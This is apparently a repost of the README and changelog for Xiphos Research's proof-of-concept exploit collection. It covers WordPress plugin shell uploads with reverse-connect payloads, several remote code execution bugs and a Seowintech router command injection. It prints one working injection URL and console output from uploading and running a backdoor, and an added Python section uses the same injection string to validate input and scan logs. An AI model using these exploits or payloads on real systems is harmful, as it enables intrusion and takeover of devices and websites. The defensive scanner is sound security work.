Changelog and tool added 25/04/2015:
+ WPsh0pwn – WordPress WPShop eCommerce Shell Upload (WPVDB-7830)
+ nmediapwn – WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload
+ pwnflow – WordPress Work the flow file upload 2.5.2 Shell Upload
+ delusions – WordPress InfusionSoft Gravity Forms Shell Upload (CVE-2014-6446)
Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.
Updates Exploits 27.04.2015:
+ phpMoAdmin Remote Code Execution (CVE-2015-2208)
+ LotusCMS Remote Code Execution (OSVDB-75095)
+ ElasticSearch Remote Code Execution (CVE-2015-1427)
+ ShellShock (httpd) Remote Code Execution (CVE-2014-6271)
+ IISlap – http.sys Denial of Service/RCE PoC (DoS only). (MS-15-034)
+ se0wned – Seowintech Router diagnostic.cgi remote root
+ WPsh0pwn – WordPress WPShop eCommerce Shell Upload (WPVDB-7830)
+ nmediapwn – WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload
+ pwnflow – WordPress Work the flow file upload 2.5.2 Shell Upload
+ delusions – WordPress InfusionSoft Gravity Forms Shell Upload (CVE-2014-6446)
+ TBA
There are no changelogs here, as that would be too much effort, just git commits. Exploits may be updated regularly for greater stability, reliability or stealthiness, so check them for updates regularly.
::Exploit for Seowintech Routers diagnostic.cgi Unauthenticated Remote Root Code Execution::
This is an exploit for an old bug. I found the exploit code lurking around on one of my old hard drives, cleaned it up, and decided to release it. A long while back, a rather interesting exploit was disclosed which affected ALL Seowontech devices. Technically, it is two exploits: a remote root command injection bug and a remote root file disclosure bug. Here, I only bother with the command injection bug. These vulnerabilities were found by one Todor Donev.
The bug we are abusing is quite simple. Like many router bugs, it lives in a CGI script used for network diagnostics, and it is the ping function that is vulnerable to our abuse: the ping_ipaddr parameter is passed to a shell command without validation.
PoC:
http://target.com/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;id;&ping_count=1&action=Apply&html_view=ping
Usage:
To use, simply specify the target routers base URL, and a MIPS executable to upload and execute.
Trojans~Princes$ python2 /tmp/se0wn.py
[SE0WNED ASCII-art banner]
Exploit for Seowintech Routers, CVE-?. Version: 20150425.1
{+} Uploading our backdoor...
{*} Backdoor is in 237 chunks...
100% |#########################################################################################################################################################################################|
{+} Setting execute bit...
{+} Executing Payload...
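For the defensive side of the diagnostic.cgi bug described above, here is an added example (not part of the Xiphos Research release) showing both halves of the fix: the allowlist check the CGI should have applied to ping_ipaddr before building a shell command, and a scanner that runs that same check over web server access logs to flag requests whose ping_ipaddr value is not a literal IP address. The log lines, hosts and timestamps are constructed for the example; the request shape of the flagged line follows the PoC URL on this page.

```python
"""Detect and reject command injection attempts in a ping-style CGI parameter.

Added example, not project code. The access-log sample below is constructed
(hypothetical hosts and timestamps); the second line mirrors the PoC request
shape for /cgi-bin/diagnostic.cgi shown on the page.
"""
import ipaddress
import re
from urllib.parse import unquote_plus

# Constructed combined-log-format lines (hypothetical data).
SAMPLE_LOG = """\
10.0.0.5 - - [25/Apr/2015:10:00:01 +0000] "GET /cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=8.8.8.8&ping_count=1&action=Apply&html_view=ping HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Apr/2015:10:00:07 +0000] "GET /cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q%20-s%200%20127.0.0.1;id;&ping_count=1&action=Apply&html_view=ping HTTP/1.1" 200 734 "-" "python-requests/2.5"
10.0.0.9 - - [25/Apr/2015:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: source address, timestamp, method, URI, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that let a value break out of a shell command line built around it.
SHELL_META = re.compile(r'[;&|`$()<>\s\'"\\]')


def split_query(query: str) -> dict:
    """Split a query string on '&' only, decoding each value once.

    Deliberately not urllib.parse.parse_qs: older Python versions also split
    on ';', which would hide exactly the character an injection relies on.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def validate_ping_target(value: str) -> bool:
    """Allowlist check a CGI must apply before handing the value to ping:
    accept only a literal IPv4 or IPv6 address, nothing else."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def inspect_uri(uri: str):
    """Return a reason string if the URI is a suspicious diagnostic.cgi ping
    request, or None if it is benign or unrelated."""
    path, _, query = uri.partition("?")
    if not path.endswith("/diagnostic.cgi"):
        return None
    target = split_query(query).get("ping_ipaddr")
    if target is None or validate_ping_target(target):
        return None
    if SHELL_META.search(target):
        return "ping_ipaddr contains shell metacharacters"
    return "ping_ipaddr is not a literal IP address"


def scan_log(text: str) -> list:
    """Run inspect_uri over every parseable log line; return the findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = inspect_uri(m.group("uri"))
        if reason:
            query = m.group("uri").partition("?")[2]
            findings.append({
                "src": m.group("src"),
                "ts": m.group("ts"),
                "ping_ipaddr": split_query(query).get("ping_ipaddr"),
                "reason": reason,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['reason']}: {f['ping_ipaddr']!r}")
```

The same validate_ping_target check serves both purposes: on the device it is the fix (reject anything that is not an address instead of trying to escape it), and in the log scanner it is the detection rule, so the two cannot drift apart. Only GET requests are logged in the sample; a POST body carrying the same parameters would need the request body, not just the access log.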
InfusionSoft Gravity Forms Shell Upload
This is an exploit for one of the most facepalm-worthy vulnerabilities ever; hence, I had to add it to the repertoire. Just… just read the advisory. You will die laughing.
Usage:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable WordPress installation.
Exploit for WordPress WPshop eCommerce 1.3.9.5 Shell Upload.
This is an exploit for a trivial shell upload vulnerability in the WPshop eCommerce plugin in versions 1.3.9.5 and below. It's a very trivial pre-auth shell upload in “ajax.php”, which we use to upload a shell and then spawn a reverse connect shell. Nothing fancy; the only reason I bothered writing an exploit for it is that I didn't want to use Metasploit and happened to have a use for it.
Usage:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable WordPress installation.
Exploit for WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload
This plugin comes with added backdoor upload features, so naturally, I had to quickly knock together an exploit for it. Basically another trivial shell upload, trying to burn through a few of these so I have non-MSF exploits for when needed.
Usage:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable WordPress installation.
Exploit for WordPress Work the flow file upload 2.5.2 Shell Upload
This plugin comes with added backdoor upload features, so naturally, I had to quickly knock together an exploit for it. Basically another trivial shell upload, trying to burn through a few of these so I have non-MSF exploits for when needed.
Usage:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable WordPress installation.
Usage Global Script:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable LotusCMS installation.
Download: Master.zip | Clone URL | Our Post Before
Source: https://github.com/XiphosResearch | http://www.xiphosresearch.com/